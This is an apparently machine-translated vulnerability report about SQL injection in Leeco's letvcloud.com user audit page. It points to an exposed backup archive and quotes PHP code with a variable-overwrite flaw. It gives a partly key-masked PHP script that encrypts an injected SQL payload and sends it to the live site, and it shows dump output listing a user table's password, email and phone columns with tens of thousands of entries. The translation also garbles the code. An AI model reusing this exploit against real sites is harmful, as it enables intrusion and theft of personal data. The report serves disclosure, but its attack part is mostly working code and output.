Leeco's important business injection can cause a large amount of enterprise information leakage.

Leeco's important business injection can cause a large amount of enterprise information leakage.

The killer detects that variable overwrite leads to arbitrary injection.

Http://www.letvcloud.com/www.tar.gz Leeco cloud has backup files

Www/Home/Lib/Action/UserAction. class. php
 

Public function auditupdate () {import ("@. ORG. util "); $ ua = $ this-> _ get ('ua '); $ uaid = $ this-> decrypturl ($ ua); parse_str ($ uaid ); $ userDao = D ('userdetail'); $ lists = $ userDao-> get ($ userid); $ this-> assign ("lists", $ lists ); $ tags = Util: getSelectHtml ('sitetypeid', $ this-> _ getWebTypeList (), 'sitetypeid', 'sitetypename', $ lists ['sitetypeid'], 1, false); // The location $ cityaction = A ('city'); $ province = $ cityaction-> getprovince (); $ provincehtml = Util: getSelectHtml ('province ', $ province, 'cityid', 'cityname', $ lists ['province '], 1, true,' -- select --'); $ cityDao = D ('city'); $ citylist = $ cityDao-> getList (false, 0, 0, 'parentid = '. $ lists ['province ']); $ cityhtml = Util: getSelectHtml ('city', $ citylist, 'cityid', 'cityname', $ lists ['city'], 1, true, '-- select --'); $ this-> assign ("webtypeselectHtml", $ webtypeselectHtml); $ this-> assign ("userid", $ userid ); $ this-> assign ("ua", $ ua); $ this-> assign ("provincehtml", $ provincehtml); $ this-> assign ("cityhtml ", $ cityhtml); $ this-> display ();}

The variable overwrites parse_str ($ uaid );

Uaid can overwrite any variable

Use decrypturl to decrypt the encrypted content of ua with aes

Find the AESkey in the configuration file

 

<?phpinclude("aes.php");$sql=$_GET['sql'];

 
  *****AES(tr**********D398bslw**********t;makeKe*****
 

$ Uaid = $ aes-> encryptString ("userid =". $ SQL, $ keys );
Echo "http://www.letvcloud.com/user/auditupdate? Ua = ". $ uaid." <br> ";
Echo file_get_contents ("http://www.letvcloud.com/user/auditupdate? Ua = ". $ uaid );
?>

If you use the above script to perform a local conversion, the userid variable can be directly overwritten and brought into the SQL query.
 

 

Table: user_detail_info[28 columns]+-------------------+--------------+| Column            | Type         |+-------------------+--------------+| address           | varchar(200) || allowclone        | tinyint(4)   || ark               | int(4)       || audittext         | text         || businesslicense   | varchar(200) || city              | varchar(50)  || codeversionrights | varchar(20)  || codeversions      | varchar(20)  || company           | varchar(100) || ctime             | int(11)      || domainname        | varchar(100) || email             | varchar(100) || is_showsearch     | tinyint(1)   || limit_upload      | int(10)      || mobile            | varchar(100) || parentid          | int(11)      || password          | varchar(100) || province          | varchar(50)  || reasonid          | int(11)      || sitename          | varchar(200) || sitetypeid        | tinyint(3)   || source            | varchar(20)  || status            | tinyint(1)   || telephone         | varchar(100) || userid            | int(11)      || username          | varchar(100) || usertype          | tinyint(3)   || utime             | int(11)      |+-------------------+--------------+[14:09:51] [INFO] fetching entries for table 'user_detail_info' on database 'bcloud'[14:09:51] [INFO] the SQL query used returns 37737 entries[14:09:53] [INFO] retrieved: 5/37737 entries

 

Solution:

Strengthen filtering to improve security awareness of O & M personnel